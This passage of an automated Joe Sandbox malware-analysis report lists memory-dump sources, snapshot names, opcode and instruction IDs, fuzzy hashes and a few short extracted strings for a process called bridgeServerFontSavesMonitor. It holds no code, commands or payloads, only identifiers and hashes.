                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c52b5ab67f0b43a24563ba67c91a7cea9260ada3764529c4b7538a8beeb8bbb
                                                            • Instruction ID: 4a0ad5af91269a95306922904d81564d3fe995a47f221ce5543937ed52bc54be
                                                            • Opcode Fuzzy Hash: 9c52b5ab67f0b43a24563ba67c91a7cea9260ada3764529c4b7538a8beeb8bbb
                                                            • Instruction Fuzzy Hash: AB31F711B0C91D0FE768BB6C6466AF573C2DF9833AB1446FAE40EC72E7DD18AC418295
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d0a4a60f5781b054e7cf7d172a6cf926834e6e842dd0d2da0f75a92758ebca7
                                                            • Instruction ID: 88db901a345b7cad395d39bd9b168e211db0db01ab64f653011d0e8c6c74b911
                                                            • Opcode Fuzzy Hash: 3d0a4a60f5781b054e7cf7d172a6cf926834e6e842dd0d2da0f75a92758ebca7
                                                            • Instruction Fuzzy Hash: C921F221B1991D0FE798BB6C946AA7976C3EB99321F1101F9E40EC32F6DD64EC418291
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
                                                            • Instruction ID: b529cb0d5a020165a2589cebfe80e937c2cc09a4da923f78c2308a07ce0e9d70
                                                            • Opcode Fuzzy Hash: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
                                                            • Instruction Fuzzy Hash: DB213A36B0D24D4EE331ABA898611EC7B60EF41325F0545B7D04C8E1D3D978268AC365
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 858c4a48687da1aa72d17c8d653b51bf26d9b31893fd282d3325ef26d6da3724
                                                            • Instruction ID: 6f2fb634c066fad1f194280234fc08e517cf86151ab51af893c9122964c28921
                                                            • Opcode Fuzzy Hash: 858c4a48687da1aa72d17c8d653b51bf26d9b31893fd282d3325ef26d6da3724
                                                            • Instruction Fuzzy Hash: 1621A731B0DA1D4FEBA8DB98C4A06A87792FF98760F554379E40DD32D2CD68AC818780
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction ID: 8648de61f7e8f57a718017e7eb081baf93b370cab94679ef4afa1c951c6e2876
                                                            • Opcode Fuzzy Hash: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction Fuzzy Hash: FE116330B0DA0E4FEAB8EBA884646B87393FF54700F0240B5D00ED72A2DD686D418650
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction ID: 64c0efb8ededd9b7375937b6ffdca0a2f26b62b885ddb8f4c57290109e2e9230
                                                            • Opcode Fuzzy Hash: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction Fuzzy Hash: 7311A721F1EA1E5BE7B4AB9884646F97293FF48710F1241B5D40EE31F2DEAC6E508690
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f5d5f02ad7baf33439ab231165e3a280a61b7a265b6791d9e8f3f8e340fb17f
                                                            • Instruction ID: b4a4ea0264ec0777c085a0bb591dd2d32549a0df758752ba45eb14d637d37e52
                                                            • Opcode Fuzzy Hash: 8f5d5f02ad7baf33439ab231165e3a280a61b7a265b6791d9e8f3f8e340fb17f
                                                            • Instruction Fuzzy Hash: 1A11ED30D0892D8FDBA8DB08C494BA973E6EB54310F2541A9D44ED3271CF74AEC5CB45
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction ID: 7d1f673562543a7625d65cf322dc3bd0157e476bbb80ed7df22ef99f9cfe7115
                                                            • Opcode Fuzzy Hash: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction Fuzzy Hash: ED017021F1AA0D4FEFB8E7B8806967822C39F94700B0A00B5D00EC72F2ECB9AD418714
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction ID: 02e6b586664894bfd40054fb4812d7ea2db9dcc27b75b9830fb5ea75b05f2daf
                                                            • Opcode Fuzzy Hash: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction Fuzzy Hash: 7E11A335B0E68D8EE721DFA8886119C7BB1EF42711F0645B7C088DB1A2D574164987A4
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3aa7803780815850d76797c18d5a2d8b80251009b47a7449f2b0e73cc15f6ed9
                                                            • Instruction ID: 514e8b122e16625aa29a871384f36b69df892c0f38895378e74c94ec818c6534
                                                            • Opcode Fuzzy Hash: 3aa7803780815850d76797c18d5a2d8b80251009b47a7449f2b0e73cc15f6ed9
                                                            • Instruction Fuzzy Hash: BE01DB11A4E6C52FD76947B05C719A13F95CF9726070A02FAE099DB1F3C84D5986C361
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ad32331694ce81838fc8a59064182af3c94c3c8f492b38f087bc4e95429afa7
                                                            • Instruction ID: f77bcad7701769c88ec3d1dd2c42f7dadcc147817c002f31151fb841c81a07ef
                                                            • Opcode Fuzzy Hash: 1ad32331694ce81838fc8a59064182af3c94c3c8f492b38f087bc4e95429afa7
                                                            • Instruction Fuzzy Hash: 5B0126367595450BC719E72CE8E64D477A0FF5213E74803F2D089CF173E958D44A8680
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a2a7ae4a3eaefa88f0e80d4207018cae27b2323ff470bda2d68951f0b98d6b9
                                                            • Instruction ID: e72067466e168418a38ffcce2033beebc533a57d8eabb2e92f6f77ad10fb9e7d
                                                            • Opcode Fuzzy Hash: 9a2a7ae4a3eaefa88f0e80d4207018cae27b2323ff470bda2d68951f0b98d6b9
                                                            • Instruction Fuzzy Hash: D3017132F094098BFBA4DB9898957FC73A1EBD8320F464271D50CD71A5DE79AA818780
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction ID: 9bf38bdb979dfdbe8453b08beff877560a5af44b111f6b5aaba68bb9f18d51f6
                                                            • Opcode Fuzzy Hash: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction Fuzzy Hash: 9B01A135B0E68D8FE722DFA8886419CBFB1EF42711F0645F7C088DB1A2D97466498764
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction ID: 3e927211c3c7800c72d106962f86ee1e44214be734c1e76048084bc6e357b956
                                                            • Opcode Fuzzy Hash: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction Fuzzy Hash: CE019235A0E38D9FD721DFA4885419CBFB1AF42710F1641E7D088DB1A2D9746645C754
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca9b55b6b3d835b8f47b898187bef3f092d46dcfeeea2c1d12b24c31106aa6a0
                                                            • Instruction ID: b4b5c72910fa5fa2d59493e586798f9c92d242596f9d038f92de2257710672e7
                                                            • Opcode Fuzzy Hash: ca9b55b6b3d835b8f47b898187bef3f092d46dcfeeea2c1d12b24c31106aa6a0
                                                            • Instruction Fuzzy Hash: 39F0591671E1980AC72AB73C68B54F83B50DFA623A78903F7D089CF0A7D808844AC345
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction ID: 0faa1cc4696bb59613143b2fb120e16deb483ffc059ebe18adf0a15aeaeba8b3
                                                            • Opcode Fuzzy Hash: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction Fuzzy Hash: 2CF08634E1D91E8BEBB8AB94C8646F97362FB44311F1241B9C04ED31A1CE786E85CA50
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction Fuzzy Hash: 98C01210B5740D51D43473AEEC664EDB741AF4811CF864171E40D84096DC491587C1AA
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 951c45c2a0a23ea344f7b847046ce02511c6079dafc3ae047fc3d06edc29c598
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 27C0123062A80E8FDA90BB68C889824BBA0FB0E201BDA00E0E04CC71A1D65A98908700
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 0268459102ce0c551be7b4bb65256f8e7f6a4332d8e466b57c9c7ba72adca42b
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: 57C01200F0B40E01E43133AA14620ACA2025BC4E18FD30032D00C800A198DD22C901AA
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a380af7e924fd9ea9c489912805d20128229eef10771f8a3219d7f69da5e624
                                                            • Instruction ID: ef7e314609c2c86b0026b4e4c6a400b77b6b5ab3502ba962519fd29775be73fe
                                                            • Opcode Fuzzy Hash: 4a380af7e924fd9ea9c489912805d20128229eef10771f8a3219d7f69da5e624
                                                            • Instruction Fuzzy Hash: FEC00214F2AD1E5BEAF8A7B480756FD11C36F45B00F460578D04EE36E2DDBC7A808AA5
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac167182980d6bb7719544e827bbe8c50cba53643e7d764df05c88bb05699b2a
                                                            • Instruction ID: fa3c0f304aa39a95f9d292ac72c8feaef834e66786fcb1ba01bca49d30fd00f9
                                                            • Opcode Fuzzy Hash: ac167182980d6bb7719544e827bbe8c50cba53643e7d764df05c88bb05699b2a
                                                            • Instruction Fuzzy Hash: 11D0C930E09628CEEBA0DB68C851B5877B2FF48310F5002F6C01DE22CACB356D819F40
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a8b391b1d605d60b120aabef3b4dead3810500b3bf232f64d55afb6e3688468
                                                            • Instruction ID: 4d53dcf905e591c3a9d6d4e090dd44042764639509f5eb9ca4d9cd6f23299cd5
                                                            • Opcode Fuzzy Hash: 3a8b391b1d605d60b120aabef3b4dead3810500b3bf232f64d55afb6e3688468
                                                            • Instruction Fuzzy Hash: A7C04C01F1CC2A17E25966144C25A7E04535F54729FD901B4E41FC72DECD5D5E0206D6
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: 5d4eb65805904c88ee28bc93bcbdd05bedc58eeb57ca7ffbcbff11d570561cfa
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: DFB01200D5B44F01E43433FB089206874415B44204FC20070D40CC019198CD22D802A7
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction ID: 8e4a554a8a868c483c7bc90b5ca82e478f5e8ff5e2530f32cd6f6945cdbe1566
                                                            • Opcode Fuzzy Hash: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction Fuzzy Hash: BEA00208D9780F11D81872FB1D9709474915FAA154FC61961E80980196FCCE17E943A3
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction ID: ca252bbcc9c737bd95515a3503bf23c8f258f5e205a98fef31eae69f3472ac0f
                                                            • Opcode Fuzzy Hash: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction Fuzzy Hash: 55A00144D6682E01A91832BA0A965A534915A88296FC902A9A948892D7E88D52EA12A2
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 8c43bb75ea278a86393614c8a78f3bb6d6f876162e107514682160d96059ff44
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: 4EB09201F0E12B56F1B003E4026927902D34F64784F0B0438E80CC61F2FDDDAE010066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: cb88ab6d95ab85b49039db9082cebfb02cedc4d518de146a2e869499167111c5
                                                            • Instruction ID: e1a95792946ef8f847ff6465fc7ab025d94a6d83d403f436d8d0e3fa9b867144
                                                            • Opcode Fuzzy Hash: cb88ab6d95ab85b49039db9082cebfb02cedc4d518de146a2e869499167111c5
                                                            • Instruction Fuzzy Hash: 2051BD17B0942745E339B3FD78219E96B449FA823FB0847B7F95E8D0C78C086486C2E9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: a6408956d2b3e01635da5ccc2187ac92fd61d630a009c3fb138447bad701b18c
                                                            • Instruction ID: 8275a662f36012fc20c8b9628a6f4621dde7938023171d19e4deae8699700a8c
                                                            • Opcode Fuzzy Hash: a6408956d2b3e01635da5ccc2187ac92fd61d630a009c3fb138447bad701b18c
                                                            • Instruction Fuzzy Hash: 2691E6B1A1AA8D4FE7999B6888757B9BFE1FF5A320F4502BED049C72E2DB741401C740
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24557b7aa28c420c0cfaf0d4d9ffeab2bc94fd6c9f416888d9be36c408598472
                                                            • Instruction ID: a3dd6c72aa180a5c3a5a4a3152ba562083e1a76e0f4b1248bb5776ae9da9db56
                                                            • Opcode Fuzzy Hash: 24557b7aa28c420c0cfaf0d4d9ffeab2bc94fd6c9f416888d9be36c408598472
                                                            • Instruction Fuzzy Hash: FBD19021B2E78D0BE32D4B684C920F53B91EBA2306B1986BDD5DBC7097D968A50783C1
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a764c5e62d134ab750aebd527372de7f9a2934b3a6f6189f944106c42a80403
                                                            • Instruction ID: 2ac02787602e7f9aa4ae3e0c8e6bda0b457b8a5193720311f449bed3da830161
                                                            • Opcode Fuzzy Hash: 3a764c5e62d134ab750aebd527372de7f9a2934b3a6f6189f944106c42a80403
                                                            • Instruction Fuzzy Hash: 2B81C171F2D34E0BE32C4A684C920B17BD5EBE6216B1A867DD9DBC3197DC68B90742C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: e50a372c66d73d6959bffac753331f53057a701bfd7f2146432d1e5f8e268a21
                                                            • Instruction ID: 1756b7ed639bd5e73031c1d9ae49dbd7a484f93142dc853b1486fea5542a7c9d
                                                            • Opcode Fuzzy Hash: e50a372c66d73d6959bffac753331f53057a701bfd7f2146432d1e5f8e268a21
                                                            • Instruction Fuzzy Hash: 58E0656160F7C44FDB15AA3484698947F70EF6721174A52EEC045CB1A3EA1D9886C701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 1efa397fa057cd1a98d39ec1929409eca4709694baa5fd15f1f24b4f36f222a6
                                                            • Instruction ID: dbfe1148f7c8508a008613384f7039a97ab8a1aed294f159a683bd8f5a2eda34
                                                            • Opcode Fuzzy Hash: 1efa397fa057cd1a98d39ec1929409eca4709694baa5fd15f1f24b4f36f222a6
                                                            • Instruction Fuzzy Hash: E9F0656160F7C44FDB16AB3488698547F70EF6720174A52EFC445CF1A3EA1D9885C711
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 4fdc5037d1a2ffd65cb09e0cabd99c4174b2f00b8cc0503b2845a88e5437da41
                                                            • Instruction ID: 8a044a4d47703dffb4ca39fd4bb869024ee6461e978eeca7060392de76daab0e
                                                            • Opcode Fuzzy Hash: 4fdc5037d1a2ffd65cb09e0cabd99c4174b2f00b8cc0503b2845a88e5437da41
                                                            • Instruction Fuzzy Hash: 21E01AA154F7C44FCB16EB75887A9857FA0AE6721078B40EEC085CF1B3E62D8949C701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 4b94087cd1d380c1118e307e5decef35a618b8e6a1e81a5d2776b665a6c132bb
                                                            • Instruction ID: 55fdb63b9008d460a4d9902cd6b10540827652113c681a0da6b0002013a1fde3
